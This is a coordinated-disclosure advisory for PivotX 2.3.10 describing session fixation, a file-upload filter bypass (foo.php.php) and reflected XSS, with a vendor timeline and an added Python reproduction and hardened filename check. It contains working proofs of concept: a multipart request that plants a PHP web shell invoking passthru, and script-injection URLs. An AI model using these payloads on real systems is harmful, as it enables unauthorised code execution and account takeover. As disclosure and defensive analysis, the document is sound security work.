PivotX 2.3.10: Session Fixation, Reflected XSS, Code Execution

  • Vulnerability: Session Fixation, Reflected XSS, Code Execution
  • Affected Software: PivotX
  • Affected Version: 2.3.10 (probably also prior versions)
  • Patched Version: 2.3.11
  • Risk: Medium-High
  • Vendor Contacted: 2015-05-27
  • Vendor Fix: 2015-06-21
  • Public Disclosure: 2015-06-27

Session Fixation

Risk

Medium; if the victim clicks the link and then logs in, the attacker can log in as the victim

POC

  1. Send victim to: http://localhost/pivotx_latest/pivotx/fileupload.php?sess=123
  2. Victim logs in
  3. Attacker sets PHPSESSID=123 and is now logged in as well

Code

    // fileupload.php:26

    if (($_COOKIE['PHPSESSID'] == '') && ($_GET['sess'] != '')) {
        session_id($_GET['sess']);
    }

File Upload: Code Execution

Risk

Medium; an attacker can upload PHP files and thus gain code execution

Description

It is possible to bypass the check for disallowed file extensions with a filename like foo.php.php: the pattern consumes the dot that follows the first ".php" as its second group, so the second ".php" is never matched, and the renamed file still ends in ".php":

        POST http://localhost/pivotx_latest/pivotx/fileupload.php?path=/var/www/pivotx_latest/pivotx/db
        Data:
        -----------------------------130539851818218479172117696272\r\nContent-Disposition: form-data; name="file"; filename="foo.php.php"\r\nContent-Type: image/png\r\n\r\n<?php \npassthru($_GET['x']);\n\r\n-----------------------------130539851818218479172117696272\r\nContent-Disposition: form-data; name="submit"\r\n\r\nUpload Image\r\n-----------------------------130539851818218479172117696272--\r\n
The attacker now has code execution at the following address:
        http://localhost/pivotx_latest/pivotx/db/foo.php_.php?x=ls

Code

    // fileupload.php:85

        $disallowedextensions = array_map('trim', explode(',', getDefault($PIVOTX['config']->get('upload_disallowed_extensions'), '.php,.php\d')));
        foreach ($disallowedextensions as $ext) {
            $pattern = "/($ext)(\.|$)/i";
            if (preg_match($pattern, $fileName)) {
                $msg = sprintf(__("File (%s) with illegal file extension (%s) uploaded - filename altered."), $fileName, $ext);
                debug($msg);
                $fileName = preg_replace($pattern, '$1_$2', $fileName);
                break;
            }
        }
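As an added illustration (not code from the advisory or from PivotX), the following Python reproduces the rename logic above with the re module, which treats this pattern the same way PCRE does, and places a stricter check beside it. The disallowed-extension list in the hardened check is an assumption, not PivotX's configuration.

```python
import re

# Default list from fileupload.php: ".php,.php\d" (the leading dot is not
# escaped, so in the regex it matches any character).
PIVOTX_DISALLOWED = (".php", r".php\d")


def pivotx_sanitize(file_name, disallowed=PIVOTX_DISALLOWED):
    """Reproduce the vulnerable rename from fileupload.php:85.

    Group 2 consumes the separator dot after the first ".php", so for
    "foo.php.php" the second ".php" is left untouched and the result is
    "foo.php_.php", which most servers still execute as PHP.
    """
    for ext in disallowed:
        pattern = re.compile(rf"({ext})(\.|$)", re.IGNORECASE)
        if pattern.search(file_name):
            # preg_replace, like re.sub, replaces every non-overlapping match
            return pattern.sub(r"\1_\2", file_name)
    return file_name


# Assumed deny list for the hardened check; extend it for the target server.
HARDENED_DENY = re.compile(r"^(php\d?|phtml|phar)$", re.IGNORECASE)


def is_safe_filename(file_name):
    """Reject, rather than rename, when any extension segment is executable.

    Every dot-separated segment after the base name is checked, not just the
    last one: Apache's mod_mime can act on any extension in a multi-extension
    name (e.g. "foo.php.png"), so a last-extension-only check is not enough.
    """
    segments = file_name.split(".")[1:]
    return not any(HARDENED_DENY.match(seg) for seg in segments)


if __name__ == "__main__":
    for name in ("foo.php.php", "foo.php", "foo.php.png", "image.png"):
        print(f"{name:14} -> renamed: {pivotx_sanitize(name):14} "
              f"safe: {is_safe_filename(name)}")
```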

Reflected XSS

Risk

Medium; arbitrary JavaScript execution, which can lead to stolen cookies, injected JavaScript keyloggers, and bypassed CSRF protection (which in this case can be used to gain code execution)

Description

PHP_SELF is user supplied (the path after index.php is under the requester's control) and therefore must not be treated as safe to output. Most or all forms appear to be affected.

POC

        http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=page&uid=3
        http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=templates
        http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=fileexplore
        [... etc; most pages are affected ...]

Timeline

  • 2015-05-27: Initial Report
  • 2015-05-27: Vendor Confirmation
  • 2015-06-05: Asking for Progress Update (no reply)
  • 2015-06-14: Setting Disclose Date
  • 2015-06-15: Vendor Confirmation
  • 2015-06-17: Vendor Sends Fix, Asking for Confirmation
  • 2015-06-17: Confirmed Fix
  • 2015-06-21: Vendor Releases Fix
  • 2015-06-27: Disclosure
